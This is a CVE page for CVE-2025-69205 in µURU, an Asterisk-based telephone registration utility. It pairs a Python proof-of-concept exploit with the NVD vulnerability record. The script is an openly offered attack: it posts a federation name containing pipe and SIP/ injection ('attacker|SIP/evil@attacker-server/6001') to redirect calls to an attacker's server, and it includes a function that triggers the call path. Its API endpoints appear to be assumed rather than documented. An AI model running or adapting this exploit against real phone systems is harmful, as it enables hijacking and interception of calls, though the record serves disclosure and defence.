CVE-2025-69205

# CVE-2025-69205 PoC - µURU Federation Name Injection # This PoC demonstrates the injection of Asterisk special characters # into the Dial() application via federation name import requests import json # Target µURU instance TARGET_URL = "http://target-uru-server:8080" # Malicious federation name with Asterisk special characters # The pipe character (|) separates Dial() parameters # The SIP/ prefix can redirect calls to attacker's server malicious_federation_name = "attacker|SIP/evil@attacker-server/6001" def create_federation_request(): """ Create a federation request with malicious federation name """ payload = { "federation_name": malicious_federation_name, "description": "Legitimate federation request", "enabled": True } # The vulnerable endpoint that accepts federation configuration endpoint = f"{TARGET_URL}/api/federation/create" try: response = requests.post( endpoint, json=payload, headers={"Content-Type": "application/json"}, timeout=10 ) print(f"[*] Federation request sent: {response.status_code}") return response.json() except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None def trigger_call_redirect(): """ Once admin accepts the federation, trigger the vulnerable call path """ endpoint = f"{TARGET_URL}/api/federation/test-call" # This will invoke Asterisk Dial() with injected parameters payload = { "source_federation": "legitimate_server", "target_federation": malicious_federation_name } try: response = requests.post(endpoint, json=payload, timeout=10) print(f"[*] Call redirect triggered: {response.status_code}") return response.json() except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None if __name__ == "__main__": print("[*] CVE-2025-69205 PoC for µURU Asterisk Dial Injection") print("[*] Target: " + TARGET_URL) print("[*] Note: Requires admin to accept federation request") # Step 1: Create malicious federation create_federation_request() # Step 2: Trigger call redirect (after admin approval) # trigger_call_redirect()

{"cve": {"id": "CVE-2025-69205", "sourceIdentifier": "[email protected]", "published": "2025-12-29T21:15:43.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Micro Registration Utility (µURU) is a telephone self registration utility based on asterisk. In versions up to and including commit 88db9a953f38a3026bcd6816d51c7f3b93c55893, an attacker can crafts a special federation name and characters treated special by asterisk can be injected into the `Dial( )` application due to improper input validation. This allows an attacker to redirect calls on both of the federating instances. If the attack succeeds, the impact is very high. However, the requires that an admin accept the federation requests. As of time of publication, a known patched version of µURU is not available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-74"}]}], "references": [{"url": "https://docs.asterisk.org/Latest_API/API_Documentation/Dialplan_Applications/Dial", "source": "[email protected]"}, {"url": "https://github.com/olell/uURU/security/advisories/GHSA-xvrh-pm3f-79v4", "source": "[email protected]"}]}}